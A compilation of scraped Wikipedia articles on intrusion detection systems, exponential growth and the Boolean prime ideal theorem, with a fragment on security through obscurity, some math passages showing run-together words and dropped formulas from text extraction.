In recent years, more advanced versions of "security through obscurity" have gained support as a methodology in cybersecurity through Moving Target Defense and cyber deception.[15] NIST's cyber resiliency framework, 800-160 Volume 2, recommends the use of security through obscurity as a complementary part of a resilient and secure computing environment.[16]
|
https://en.wikipedia.org/wiki/Security_through_obscurity
|
An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations.[1] Any intrusion activity or violation is typically either reported to an administrator or collected centrally using a security information and event management (SIEM) system. A SIEM system combines outputs from multiple sources and uses alarm filtering techniques to distinguish malicious activity from false alarms.[2]
IDS types range in scope from single computers to large networks.[3] The most common classifications are network intrusion detection systems (NIDS) and host-based intrusion detection systems (HIDS). A system that monitors important operating system files is an example of an HIDS, while a system that analyzes incoming network traffic is an example of an NIDS. It is also possible to classify IDS by detection approach. The most well-known variants are signature-based detection (recognizing bad patterns, such as exploitation attempts) and anomaly-based detection (detecting deviations from a model of "good" traffic, which often relies on machine learning). Another common variant is reputation-based detection (recognizing a potential threat according to reputation scores). Some IDS products have the ability to respond to detected intrusions; systems with response capabilities are typically referred to as intrusion prevention systems (IPS).[4] Intrusion detection systems can also serve specific purposes by augmenting them with custom tools, such as using a honeypot to attract and characterize malicious traffic.[5]
Although they both relate to network security, an IDS differs from a firewall in that a conventional network firewall (distinct from a next-generation firewall) uses a static set of rules to permit or deny network connections. It implicitly prevents intrusions, assuming an appropriate set of rules has been defined. Essentially, firewalls limit access between networks to prevent intrusion and do not signal an attack from inside the network. An IDS describes a suspected intrusion once it has taken place and signals an alarm. An IDS also watches for attacks that originate from within a system. This is traditionally achieved by examining network communications, identifying heuristics and patterns (often known as signatures) of common computer attacks, and taking action to alert operators. A system that terminates connections is called an intrusion prevention system, and performs access control like an application layer firewall.[6]
IDS can be classified by where detection takes place (network or host) or by the detection method that is employed (signature-based or anomaly-based).[7]
Network intrusion detection systems (NIDS) are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network.[8] A NIDS analyzes passing traffic on the entire subnet and matches it against a library of known attacks. Once an attack is identified, or abnormal behavior is sensed, an alert can be sent to the administrator. NIDS function to safeguard every device and the entire network from unauthorized access.[9]
An example of an NIDS would be installing it on the subnet where firewalls are located in order to see if someone is trying to break into the firewall. Ideally one would scan all inbound and outbound traffic; however, doing so might create a bottleneck that would impair the overall speed of the network. OPNET and NetSim are commonly used tools for simulating network intrusion detection systems. NIDS are also capable of comparing signatures of similar packets in order to link and drop harmful detected packets whose signatures match records in the NIDS. Classified by the system-interactivity property, there are two types of NIDS: on-line and off-line, often referred to as inline and tap mode, respectively. On-line NIDS deal with the network in real time, analyzing Ethernet packets and applying rules to decide whether traffic constitutes an attack. Off-line NIDS deal with stored data and pass it through some processes to decide if it represents an attack.
NIDS can also be combined with other technologies to increase detection and prediction rates. Artificial neural network (ANN)-based IDS are capable of analyzing huge volumes of data thanks to their hidden layers and non-linear modeling, although this process takes time due to the complex structure.[10] This allows IDS to more efficiently recognize intrusion patterns.[11] Neural networks assist IDS in predicting attacks by learning from mistakes; ANN-based IDS help develop an early warning system based on two layers. The first layer accepts single values, while the second layer takes the first layer's output as input; the cycle repeats and allows the system to automatically recognize new, unforeseen patterns in the network.[12] Such a system can average a 99.9% detection and classification rate, based on research results across 24 network attacks divided into four categories: DoS, probe, remote-to-local, and user-to-root.[13]
Host intrusion detection systems (HIDS) run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the device only and will alert the user or administrator if suspicious activity is detected. It takes a snapshot of existing system files and matches it to the previous snapshot. If the critical system files were modified or deleted, an alert is sent to the administrator to investigate. An example of HIDS usage can be seen on mission critical machines, which are not expected to change their configurations.[14][15]
Signature-based IDS detect attacks by looking for specific patterns, such as byte sequences in network traffic or known malicious instruction sequences used by malware.[16] This terminology originates from anti-virus software, which refers to these detected patterns as signatures. Although signature-based IDS can easily detect known attacks, it is difficult for them to detect new attacks, for which no pattern is yet available.[17]
In signature-based IDS, the signatures are released by a vendor for all its products. Timely updating of the IDS with new signatures is a key aspect.
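As a toy illustration of the idea (the signatures and labels here are invented for the example, not taken from any real IDS), signature matching can be sketched as a substring search over packet payloads:

```python
# Toy sketch of signature-based detection: each signature is a byte sequence,
# and a payload is flagged if any signature occurs anywhere in it.
# A real IDS uses far larger, vendor-maintained signature databases.

SIGNATURES = {
    b"/etc/passwd": "path traversal attempt",
    b"' OR '1'='1": "SQL injection probe",
    b"\x90\x90\x90\x90": "NOP sled (possible shellcode)",
}

def match_signatures(payload: bytes):
    """Return the labels of all signatures found in the payload."""
    return [label for sig, label in SIGNATURES.items() if sig in payload]

alerts = match_signatures(b"GET /../../etc/passwd HTTP/1.1")
print(alerts)  # ['path traversal attempt']
```

The sketch also shows the limitation noted above: only payloads containing a known pattern are flagged, so a novel attack produces no alert.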
Anomaly-based intrusion detection systems were introduced primarily to detect unknown attacks, in part due to the rapid development of malware. The basic approach is to use machine learning to create a model of trustworthy activity and then compare new behavior against this model. Since these models can be trained according to specific applications and hardware configurations, machine-learning-based methods generalize better than traditional signature-based IDS. Although this approach enables the detection of previously unknown attacks, it may suffer from false positives: previously unknown legitimate activity may also be classified as malicious. Many existing IDSs also suffer from time-consuming detection processes that degrade their performance; an efficient feature selection algorithm makes the classification process used in detection more reliable.[18]
New types of what could be called anomaly-based intrusion detection systems are viewed by Gartner as User and Entity Behavior Analytics (UEBA)[19] (an evolution of the user behavior analytics category) and network traffic analysis (NTA).[20] In particular, NTA deals with malicious insiders as well as targeted external attacks that have compromised a user machine or account. Gartner has noted that some organizations have opted for NTA over more traditional IDS.[21]
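A minimal sketch of the anomaly-based idea (the baseline data and the 3-sigma threshold here are made up for illustration; production systems use far richer features and learned models):

```python
# Minimal sketch of anomaly-based detection: model "normal" behaviour from a
# baseline of observations (here, request sizes in bytes) and flag values that
# deviate by more than 3 standard deviations from the baseline mean.
import statistics

baseline = [512, 480, 530, 501, 495, 520, 489, 510, 505, 498]
mean = statistics.mean(baseline)
std = statistics.stdev(baseline)

def is_anomalous(value, threshold=3.0):
    return abs(value - mean) / std > threshold

print(is_anomalous(500))   # False: consistent with the baseline
print(is_anomalous(9000))  # True: far outside the model of "good" traffic
```

The false-positive risk mentioned above shows up directly: any legitimate value far from the baseline would be flagged just the same.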
Some systems may attempt to stop an intrusion attempt but this is neither required nor expected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, and reporting attempts. In addition, organizations use IDPS for other purposes, such as identifying problems with security policies, documenting existing threats and deterring individuals from violating security policies. IDPS have become a necessary addition to the security infrastructure of nearly every organization.[22]
IDPS typically record information related to observed events, notify security administrators of important observed events and produce reports. Many IDPS can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g. reconfiguring a firewall) or changing the attack's content.[22]
Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it, and attempt to block or stop it.[23]
Intrusion prevention systems are considered extensions of intrusion detection systems because both monitor network traffic and/or system activities for malicious activity. The main difference is that, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected.[24]: 273 [25]: 289 An IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection, or blocking traffic from the offending IP address.[26] An IPS can also correct cyclic redundancy check (CRC) errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwanted transport- and network-layer options.[24]: 278 [27]
Intrusion prevention systems can be classified into four different types:[23][28]
The majority of intrusion prevention systems utilize one of three detection methods: signature-based, statistical anomaly-based, and stateful protocol analysis.[25]: 301[29]
The correct placement of intrusion detection systems is critical and varies depending on the network. The most common placement is behind the firewall, on the edge of a network. This practice provides the IDS with high visibility of traffic entering the network, though it will not see any traffic between users within the network. The edge of the network is the point at which a network connects to the extranet. Another practice that can be adopted if more resources are available is a strategy where a technician places the first IDS at the point of highest visibility and, depending on resource availability, places another at the next highest point, continuing that process until all points of the network are covered.[33]
If an IDS is placed beyond a network's firewall, its main purpose is to defend against noise from the internet but, more importantly, against common attacks such as port scans and network mappers. An IDS in this position would monitor layers 4 through 7 of the OSI model and would be signature-based. This is a very useful practice, because rather than showing actual breaches into the network that made it through the firewall, attempted breaches are shown, which reduces the number of false positives. The IDS in this position also helps decrease the amount of time it takes to discover successful attacks against a network.[34]
Sometimes an IDS with more advanced features is integrated with a firewall in order to intercept sophisticated attacks entering the network. Examples of advanced features include multiple security contexts at the routing level and bridging mode. All of this in turn potentially reduces cost and operational complexity.[34]
Another option for IDS placement is within the actual network, where it will reveal attacks or suspicious activity inside the network. Ignoring the security within a network can cause many problems: it will either allow users to bring about security risks or allow an attacker who has already broken into the network to roam around freely. Intense intranet security makes it difficult for even those hackers within the network to maneuver around and escalate their privileges.[34]
There are a number of techniques which attackers are using, the following are considered 'simple' measures which can be taken to evade IDS:
The earliest preliminary IDS concept was delineated in 1980 by James Anderson at the National Security Agency and consisted of a set of tools intended to help administrators review audit trails.[38] User access logs, file access logs, and system event logs are examples of audit trails.
Fred Cohen noted in 1987 that it is impossible to detect an intrusion in every case, and that the resources needed to detect intrusions grow with the amount of usage.[39]
Dorothy E. Denning, assisted by Peter G. Neumann, published a model of an IDS in 1986 that formed the basis for many systems today.[40] Her model used statistics for anomaly detection, and resulted in an early IDS at SRI International named the Intrusion Detection Expert System (IDES), which ran on Sun workstations and could consider both user- and network-level data.[41] IDES had a dual approach: a rule-based expert system to detect known types of intrusions, plus a statistical anomaly detection component based on profiles of users, host systems, and target systems. The author of "IDES: An Intelligent System for Detecting Intruders", Teresa F. Lunt, proposed adding an artificial neural network as a third component; she said all three components could then report to a resolver. SRI followed IDES in 1993 with the Next-generation Intrusion Detection Expert System (NIDES).[42]
The Multics intrusion detection and alerting system (MIDAS), an expert system using P-BEST and Lisp, was developed in 1988 based on the work of Denning and Neumann.[43] Haystack was also developed in that year, using statistics to reduce audit trails.[44]
In 1986 the National Security Agency started an IDS research transfer program under Rebecca Bace. Bace later published the seminal text on the subject, Intrusion Detection, in 2000.[45]
Wisdom & Sense (W&S) was a statistics-based anomaly detector developed in 1989 at the Los Alamos National Laboratory.[46] W&S created rules based on statistical analysis, and then used those rules for anomaly detection.
In 1990, the Time-based Inductive Machine (TIM) did anomaly detection using inductive learning of sequential user patterns in Common Lisp on a VAX 3500 computer.[47] The Network Security Monitor (NSM) performed masking on access matrices for anomaly detection on a Sun-3/50 workstation.[48] The Information Security Officer's Assistant (ISOA) was a 1990 prototype that considered a variety of strategies including statistics, a profile checker, and an expert system.[49] ComputerWatch at AT&T Bell Labs used statistics and rules for audit data reduction and intrusion detection.[50]
Then, in 1991, researchers at the University of California, Davis created a prototype Distributed Intrusion Detection System (DIDS), which was also an expert system.[51] The Network Anomaly Detection and Intrusion Reporter (NADIR), also from 1991, was a prototype IDS developed at the Los Alamos National Laboratory's Integrated Computing Network (ICN), and was heavily influenced by the work of Denning and Lunt.[52] NADIR used a statistics-based anomaly detector and an expert system.
The Lawrence Berkeley National Laboratory announced Bro in 1998, which used its own rule language for packet analysis from libpcap data.[53] Network Flight Recorder (NFR) in 1999 also used libpcap.[54]
APE was developed as a packet sniffer, also using libpcap, in November 1998, and was renamed Snort one month later. Snort has since become the world's most widely used IDS/IPS system, with over 300,000 active users.[55] It can monitor both local systems and remote capture points using the TZSP protocol.
The Audit Data Analysis and Mining (ADAM) IDS in 2001 used tcpdump to build profiles of rules for classifications.[56] In 2003, Yongguang Zhang and Wenke Lee argued for the importance of IDS in networks with mobile nodes.[57]
In 2015, Viegas and his colleagues[58] proposed an anomaly-based intrusion detection engine targeting system-on-chip (SoC) platforms, for instance for Internet of Things (IoT) applications. The proposal applies machine learning for anomaly detection, providing energy efficiency for decision tree, naive Bayes, and k-nearest neighbors classifier implementations on an Atom CPU, along with their hardware-friendly implementation on an FPGA.[59][60] In the literature, this was the first work to implement each classifier equivalently in software and hardware and to measure its energy consumption on both. It was also the first time the energy consumption of extracting each feature used for network packet classification was measured, in both the software and hardware implementations.[61]
This article incorporates public domain material from Karen Scarfone, Peter Mell. Guide to Intrusion Detection and Prevention Systems, SP 800-94 (PDF). National Institute of Standards and Technology. Retrieved 1 January 2010.
|
https://en.wikipedia.org/wiki/Intrusion_detection_system
|
Exponential growth occurs when a quantity grows as an exponential function of time. The quantity grows at a rate directly proportional to its present size. For example, when it is 3 times as big as it is now, it will be growing 3 times as fast as it is now.
In more technical language, the instantaneous rate of change (that is, the derivative) of the quantity with respect to an independent variable is proportional to the quantity itself. Often the independent variable is time. Described as a function, a quantity undergoing exponential growth is an exponential function of time; that is, the variable representing time is the exponent (in contrast to other types of growth, such as quadratic growth). Exponential growth is the inverse of logarithmic growth.
Not all cases of growth at an always increasing rate are instances of exponential growth. For example, the function f(x) = x³ grows at an ever increasing rate, but is much slower than growing exponentially: when x = 1 it grows at 3 times its size, but when x = 10 it grows at only 30% of its size. If an exponentially growing function grows at a rate that is 3 times its present size, then it always grows at a rate that is 3 times its present size; when it is 10 times as big as it is now, it will grow 10 times as fast.
If the constant of proportionality is negative, then the quantity decreases over time, and is said to be undergoing exponential decay instead. In the case of a discrete domain of definition with equal intervals, it is also called geometric growth or geometric decay, since the function values form a geometric progression.
The formula for exponential growth of a variable x at the growth rate r, as time t goes on in discrete intervals (that is, at integer times 0, 1, 2, 3, ...), is

x_t = x_0 (1 + r)^t
where x₀ is the value of x at time 0. The growth of a bacterial colony is often used to illustrate it. One bacterium splits itself into two, each of which splits itself, resulting in four, then eight, 16, 32, and so on. The amount of increase keeps increasing because it is proportional to the ever-increasing number of bacteria. Growth like this is observed in real-life activity or phenomena, such as the spread of virus infection, the growth of debt due to compound interest, and the spread of viral videos. In real cases, initial exponential growth often does not last forever, instead slowing down eventually due to upper limits caused by external factors and turning into logistic growth.
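The discrete formula can be evaluated directly; a short sketch with a hypothetical starting value of 100 and a 5% growth rate per period:

```python
# Discrete-time exponential growth x_t = x0 * (1 + r)**t.
# x0 = 100 and r = 0.05 (5% per period) are example values.
x0, r = 100.0, 0.05

def x(t):
    return x0 * (1 + r) ** t

for t in (0, 1, 2, 10):
    print(t, round(x(t), 2))  # 100.0, 105.0, 110.25, ...
```

Each period multiplies the quantity by the same factor 1 + r, which is why the values form a geometric progression.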
Terms like "exponential growth" are sometimes incorrectly interpreted as "rapid growth". Indeed, something that grows exponentially can in fact be growing slowly at first.[1][2]
A quantity x depends exponentially on time t if

x(t) = a · b^(t/τ)

where the constant a is the initial value of x, x(0) = a; the constant b is a positive growth factor; and τ is the time constant, the time required for x to increase by one factor of b:

x(t + τ) = a · b^((t+τ)/τ) = a · b^(t/τ) · b^(τ/τ) = x(t) · b.

If τ > 0 and b > 1, then x has exponential growth. If τ < 0 and b > 1, or τ > 0 and 0 < b < 1, then x has exponential decay.
Example: If a species of bacteria doubles every ten minutes, starting out with only one bacterium, how many bacteria would be present after one hour? The question implies a = 1, b = 2 and τ = 10 min.

x(t) = a · b^(t/τ) = 1 · 2^(t/(10 min))
x(1 hr) = 1 · 2^((60 min)/(10 min)) = 1 · 2⁶ = 64.
After one hour, or six ten-minute intervals, there would be sixty-four bacteria.
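The same computation takes a couple of lines of Python:

```python
# The worked example above: a = 1, b = 2, tau = 10 minutes, so
# x(t) = 1 * 2**(t/10) with t measured in minutes.
def bacteria(t_minutes):
    return 1 * 2 ** (t_minutes / 10)

print(bacteria(60))  # 64.0 bacteria after one hour
```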
Many pairs (b, τ) of a dimensionless non-negative number b and an amount of time τ (a physical quantity which can be expressed as the product of a number of units and a unit of time) represent the same growth rate, with τ proportional to log b. For any fixed b not equal to 1 (e.g. e or 2), the growth rate is given by the non-zero time τ. For any non-zero time τ, the growth rate is given by the dimensionless positive number b.
Thus the law of exponential growth can be written in different but mathematically equivalent forms, by using a different base. The most common forms are the following:

x(t) = x₀ · e^(kt) = x₀ · e^(t/τ) = x₀ · 2^(t/T) = x₀ · (1 + r/100)^(t/p),

where x₀ expresses the initial quantity x(0).
Parameters (negative in the case of exponential decay):
The quantities k, τ, and T, and for a given p also r, have a one-to-one connection given by the following equation (which can be derived by taking the natural logarithm of the above):

k = 1/τ = (ln 2)/T = ln(1 + r/100)/p

where k = 0 corresponds to r = 0 and to τ and T being infinite.
If p is the unit of time, the quotient t/p is simply the number of units of time. Using the notation t for the (dimensionless) number of units of time rather than the time itself, t/p can be replaced by t, but for uniformity this has been avoided here. In this case the division by p in the last formula is not a numerical division either, but converts a dimensionless number to the correct quantity including units.
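These relations can be verified numerically; a sketch assuming a doubling time T = 10 and p = 1, checking that all four equivalent forms give one doubling after time T:

```python
# Check the equivalence of the growth-rate parameters for a quantity that
# doubles every T = 10 units of time (example values, p = 1).
import math

T = 10.0                      # doubling time
k = math.log(2) / T           # continuous growth constant
tau = 1.0 / k                 # e-folding time
r = 100 * (math.exp(k) - 1)   # percent growth per unit time

x0 = 1.0
via_e = x0 * math.exp(k * T)            # base-e form
via_2 = x0 * 2 ** (T / T)               # base-2 form
via_r = x0 * (1 + r / 100) ** T         # percent form
print(via_e, via_2, via_r)  # all equal 2.0 up to rounding
```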
A popular approximate method for calculating the doubling time from the growth rate is the rule of 70, that is, T ≃ 70/r.
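A quick comparison (illustrative) of the rule-of-70 estimate with the exact doubling time T = ln 2 / ln(1 + r/100) for a few growth rates:

```python
# Rule of 70 (approximate) versus the exact doubling time, for growth rates
# r in percent per period.
import math

for r in (1, 2, 5, 7, 10):
    exact = math.log(2) / math.log(1 + r / 100)
    approx = 70 / r
    print(r, round(exact, 2), round(approx, 2))
```

The approximation works because ln 2 ≈ 0.693 and ln(1 + r/100) ≈ r/100 for small r.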
If a variable x exhibits exponential growth according to x(t) = x₀(1 + r)^t, then the log (to any base) of x grows linearly over time, as can be seen by taking logarithms of both sides of the exponential growth equation:

log x(t) = log x₀ + t · log(1 + r).

This allows an exponentially growing variable to be modeled with a log-linear model. For example, if one wishes to empirically estimate the growth rate from intertemporal data on x, one can linearly regress log x on t.
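As a sketch of this estimation procedure (on synthetic, noiseless data), a least-squares fit of log x against t recovers the growth rate from the fitted slope log(1 + r):

```python
# Estimate the growth rate by linearly regressing log(x) on t.
# The data here are synthetic, generated with a known rate r_true = 0.08.
import math

r_true = 0.08
data = [(t, 50.0 * (1 + r_true) ** t) for t in range(20)]

# Closed-form least-squares slope of log(x) against t (no libraries needed).
n = len(data)
ts = [t for t, _ in data]
ys = [math.log(x) for _, x in data]
t_bar, y_bar = sum(ts) / n, sum(ys) / n
slope = (sum((t - t_bar) * (y - y_bar) for t, y in zip(ts, ys))
         / sum((t - t_bar) ** 2 for t in ts))

r_hat = math.exp(slope) - 1   # invert slope = ln(1 + r)
print(round(r_hat, 6))  # recovers 0.08
```

With noisy real-world data the same regression gives an estimate rather than the exact rate.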
The exponential function x(t) = x₀e^(kt) satisfies the linear differential equation

dx/dt = kx,

saying that the change per instant of time of x at time t is proportional to the value of x(t), with initial value x(0) = x₀.
The differential equation is solved by direct integration:

dx/dt = kx
dx/x = k dt
∫_{x₀}^{x(t)} dx/x = k ∫₀^t dt
ln(x(t)/x₀) = kt,

so that x(t) = x₀e^(kt).
In the above differential equation, if k < 0, then the quantity experiences exponential decay.
For a nonlinear variation of this growth model see logistic function.
In the long run, exponential growth of any kind will overtake linear growth of any kind (that is the basis of the Malthusian catastrophe) as well as any polynomial growth, that is, for all α:

lim_{t→∞} t^α / (a e^t) = 0.
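The limit can be illustrated numerically; even with a large exponent α = 10 (and a = 1), the ratio t^α / e^t collapses toward 0:

```python
# t**alpha / e**t shrinks to 0 as t grows, even for a large exponent alpha.
import math

alpha = 10
ratios = [t ** alpha / math.exp(t) for t in (10, 50, 100)]
print(ratios)  # strictly decreasing toward 0
```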
There is a whole hierarchy of conceivable growth rates that are slower than exponential and faster than linear (in the long run). See Degree of a polynomial § Computed from the function values.
Growth rates may also be faster than exponential. In the most extreme case, when growth increases without bound in finite time, it is called hyperbolic growth. In between exponential and hyperbolic growth lie more classes of growth behavior, like the hyperoperations beginning at tetration, and A(n, n), the diagonal of the Ackermann function.
In reality, initial exponential growth is often not sustained forever. After some period, it will be slowed by external or environmental factors. For example, population growth may reach an upper limit due to resource limitations.[9] In 1845, the Belgian mathematician Pierre François Verhulst first proposed a mathematical model of growth like this, called "logistic growth".[10]
Exponential growth models of physical phenomena only apply within limited regions, as unbounded growth is not physically realistic. Although growth may initially be exponential, the modelled phenomena will eventually enter a region in which previously ignored negative feedback factors become significant (leading to a logistic growth model) or other underlying assumptions of the exponential growth model, such as continuity or instantaneous feedback, break down.
Studies show that human beings have difficulty understanding exponential growth. Exponential growth bias is the tendency to underestimate compound growth processes. This bias can have financial implications as well.[11]
According to legend, vizier Sissa Ben Dahir presented an Indian King Sharim with a beautiful handmadechessboard. The king asked what he would like in return for his gift and the courtier surprised the king by asking for one grain of rice on the first square, two grains on the second, four grains on the third, and so on. The king readily agreed and asked for the rice to be brought. All went well at first, but the requirement for2n−1grains on thenth square demanded over a million grains on the 21st square, more than a million million (a.k.a.trillion) on the 41st and there simply was not enough rice in the whole world for the final squares. (From Swirski, 2006)[12]
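The legend's arithmetic is easy to verify; this sketch (helper names are illustrative) computes the grains demanded on each square and the total over the whole board:

```python
def grains_on_square(n):
    """Grains demanded on the nth square: 2 to the power (n - 1)."""
    return 2 ** (n - 1)

def total_grains(squares=64):
    """Geometric sum 1 + 2 + 4 + ... over all squares: 2**squares - 1."""
    return 2 ** squares - 1

# Square 21 already demands over a million grains,
# and square 41 over a million million.
```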
The "second half of the chessboard" refers to the time when an exponentially growing influence is having a significant economic impact on an organization's overall business strategy.
French children are offered a riddle, which appears to be an aspect of exponential growth: "the apparent suddenness with which an exponentially growing quantity approaches a fixed limit". The riddle imagines a water lily plant growing in a pond. The plant doubles in size every day and, if left alone, it would smother the pond in 30 days killing all the other living things in the water. Day after day, the plant's growth is small, so it is decided that it won't be a concern until it covers half of the pond. Which day will that be? The 29th day, leaving only one day to save the pond.[13][12]
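The riddle's answer follows directly from the doubling rule; a minimal sketch, assuming the pond is fully covered on day 30:

```python
def coverage_fraction(day, full_day=30):
    """Fraction of the pond covered on `day` if coverage doubles daily
    and the pond is fully covered on `full_day`."""
    return 2.0 ** (day - full_day)

# Half the pond is covered only on day 29 -- one day before it is smothered.
```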
|
https://en.wikipedia.org/wiki/Exponential_growth
|
Inmathematics, theBoolean prime ideal theoremstates thatidealsin aBoolean algebracan be extended toprime ideals. A variation of this statement forfilters on setsis known as theultrafilter lemma. Other theorems are obtained by considering different mathematical structures with appropriate notions of ideals, for example,ringsand prime ideals (of ring theory), ordistributive latticesandmaximalideals (oforder theory). This article focuses on prime ideal theorems from order theory.
Although the various prime ideal theorems may appear simple and intuitive, they cannot be deduced in general from the axioms ofZermelo–Fraenkel set theorywithout the axiom of choice (abbreviated ZF). Instead, some of the statements turn out to be equivalent to theaxiom of choice(AC), while others—the Boolean prime ideal theorem, for instance—represent a property that is strictly weaker than AC. It is due to this intermediate status between ZF and ZF + AC (ZFC) that the Boolean prime ideal theorem is often taken as an axiom of set theory. The abbreviations BPI or PIT (for Boolean algebras) are sometimes used to refer to this additional axiom.
Anorder idealis a (non-empty)directedlower set. If the consideredpartially ordered set(poset) has binarysuprema(a.k.a.joins), as do the posets within this article, then this is equivalently characterized as a non-empty lower setIthat is closed for binary suprema (that is,x,y∈I{\displaystyle x,y\in I}impliesx∨y∈I{\displaystyle x\vee y\in I}). An idealIis prime if its set-theoretic complement in the poset is afilter(that is,x∧y∈I{\displaystyle x\wedge y\in I}impliesx∈I{\displaystyle x\in I}ory∈I{\displaystyle y\in I}). Ideals are proper if they are not equal to the whole poset.
Historically, the first statement relating to later prime ideal theorems was in fact referring to filters—subsets that are ideals with respect to thedualorder. The ultrafilter lemma states that every filter on a set is contained within some maximal (proper) filter—anultrafilter. Recall that filters on sets are proper filters of the Boolean algebra of itspowerset. In this special case, maximal filters (i.e. filters that are not strict subsets of any proper filter) and prime filters (i.e. filters that with each union of subsetsXandYcontain alsoXorY) coincide. The dual of this statement thus assures that every ideal of a powerset is contained in a prime ideal.
The above statement led to various generalized prime ideal theorems, each of which exists in a weak and in a strong form.Weak prime ideal theoremsstate that everynon-trivialalgebra of a certain class has at least one prime ideal. In contrast,strong prime ideal theoremsrequire that every ideal that is disjoint from a given filter can be extended to a prime ideal that is still disjoint from that filter. In the case of algebras that are not posets, one uses different substructures instead of filters. Many forms of these theorems are actually known to be equivalent, so that the assertion that "PIT" holds is usually taken as the assertion that the corresponding statement for Boolean algebras (BPI) is valid.
Another variation of similar theorems is obtained by replacing each occurrence ofprime idealbymaximal ideal. The corresponding maximal ideal theorems (MIT) are often—though not always—stronger than their PIT equivalents.
The Boolean prime ideal theorem is the strong prime ideal theorem for Boolean algebras. Thus the formal statement is:
The weak prime ideal theorem for Boolean algebras simply states:
We refer to these statements as the weak and strongBPI. The two are equivalent, as the strong BPI clearly implies the weak BPI, and the reverse implication can be achieved by using the weak BPI to find prime ideals in the appropriate quotient algebra.
The BPI can be expressed in various ways. For this purpose, recall the following theorem:
For any idealIof a Boolean algebraB, the following are equivalent:
This theorem is a well-known fact for Boolean algebras. Its dual establishes the equivalence of prime filters and ultrafilters. Note that the last property is in fact self-dual—only the prior assumption thatIis an ideal gives the full characterization. All of the implications within this theorem can be proven in ZF.
Thus the following (strong) maximal ideal theorem (MIT) for Boolean algebras is equivalent to BPI:
Note that one requires "global" maximality, not just maximality with respect to being disjoint fromF. Yet, this variation yields another equivalent characterization of BPI:
The fact that this statement is equivalent to BPI is easily established by noting the following theorem: For anydistributive latticeL, if an idealIis maximal among all ideals ofLthat are disjoint to a given filterF, thenIis a prime ideal. The proof for this statement (which can again be carried out in ZF set theory) is included in the article on ideals. Since any Boolean algebra is a distributive lattice, this shows the desired implication.
All of the above statements are now easily seen to be equivalent. Going even further, one can exploit the fact that the dual orders of Boolean algebras are exactly the Boolean algebras themselves. Hence, when taking the equivalent duals of all former statements, one ends up with a number of theorems that equally apply to Boolean algebras, but where every occurrence ofidealis replaced byfilter[citation needed]. It is worth noting that for the special case where the Boolean algebra under consideration is apowersetwith thesubsetordering, the "maximal filter theorem" is called the ultrafilter lemma.
Summing up, for Boolean algebras, the weak and strong MIT, the weak and strong PIT, and these statements with filters in place of ideals are all equivalent. It is known that all of these statements are consequences of theAxiom of Choice,AC(the easy proof makes use ofZorn's lemma), but cannot be proven inZF(Zermelo–Fraenkel set theory withoutAC), if ZF isconsistent. Yet, the BPI is strictly weaker than the axiom of choice, though the proof of this statement, due to J. D. Halpern andAzriel Lévy, is rather non-trivial.
The prototypical properties that were discussed for Boolean algebras in the above section can easily be modified to include more generallattices, such asdistributive latticesorHeyting algebras. However, in these cases maximal ideals are different from prime ideals, and the relation between PITs and MITs is not obvious.
Indeed, it turns out that the MITs for distributive lattices and even for Heyting algebras are equivalent to the axiom of choice. On the other hand, it is known that the strong PIT for distributive lattices is equivalent to BPI (i.e. to the MIT and PIT for Boolean algebras). Hence this statement is strictly weaker than the axiom of choice. Furthermore, observe that Heyting algebras are not self-dual, and thus using filters in place of ideals yields different theorems in this setting. Perhaps surprisingly, the MIT for the duals of Heyting algebras is not stronger than BPI, which is in sharp contrast to the abovementioned MIT for Heyting algebras.
Finally, prime ideal theorems also exist for other (not order-theoretical) abstract algebras. For example, the MIT for rings implies the axiom of choice. This situation requires replacing the order-theoretic term "filter" by other concepts—for rings a "multiplicatively closed subset" is appropriate.
A filter on a setXis a nonempty collection of nonempty subsets ofXthat is closed under finite intersection and under superset. An ultrafilter is a maximal filter.
The ultrafilter lemma states that every filter on a setXis a subset of someultrafilteronX.[1]An ultrafilter that does not contain finite sets is called "non-principal". The ultrafilter lemma, and in particular the existence of non-principal ultrafilters (consider the filter of all sets with finite complements), can be proven fromZorn's lemma.
The ultrafilter lemma is equivalent to the Boolean prime ideal theorem, with the equivalence provable in ZF set theory without the axiom of choice. The idea behind the proof is that the subsets of any set form a Boolean algebra partially ordered by inclusion, and any Boolean algebra is representable as an algebra of sets byStone's representation theorem.
If the setXis finite then the ultrafilter lemma can be proven from the axioms ZF. This is no longer true for infinite sets; an additional axiommustbe assumed.Zorn's lemma, theaxiom of choice, andTychonoff's theoremcan all be used to prove the ultrafilter lemma. The ultrafilter lemma is strictly weaker than the axiom of choice.
The ultrafilter lemma has manyapplications in topology; for example, it can be used to prove theHahn–Banach theoremand theAlexander subbase theorem.
Intuitively, the Boolean prime ideal theorem states that there are "enough" prime ideals in a Boolean algebra in the sense that we can extendeveryideal to a maximal one. This is of practical importance for provingStone's representation theorem for Boolean algebras, a special case ofStone duality, in which one equips the set of all prime ideals with a certain topology and can indeed regain the original Boolean algebra (up toisomorphism) from this data. Furthermore, it turns out that in applications one can freely choose either to work with prime ideals or with prime filters, because every ideal uniquely determines a filter: the set of all Boolean complements of its elements. Both approaches are found in the literature.
Many other theorems of general topology that are often said to rely on the axiom of choice are in fact equivalent to BPI. For example, the theorem that a product of compactHausdorff spacesis compact is equivalent to it. If we leave out "Hausdorff" we get atheoremequivalent to the full axiom of choice.
Ingraph theory, thede Bruijn–Erdős theoremis another equivalent to BPI. It states that, if a given infinite graph requires at least some finite numberkin anygraph coloring, then it has a finite subgraph that also requiresk.[2]
A less well-known application of the Boolean prime ideal theorem is the existence of anon-measurable set[3](the example usually given is theVitali set, which requires the axiom of choice). From this and the fact that the BPI is strictly weaker than the axiom of choice, it follows that the existence of non-measurable sets is strictly weaker than the axiom of choice.
In linear algebra, the Boolean prime ideal theorem can be used to prove that any twobasesof a givenvector spacehave the samecardinality.
|
https://en.wikipedia.org/wiki/Boolean_prime_ideal_theorem
|
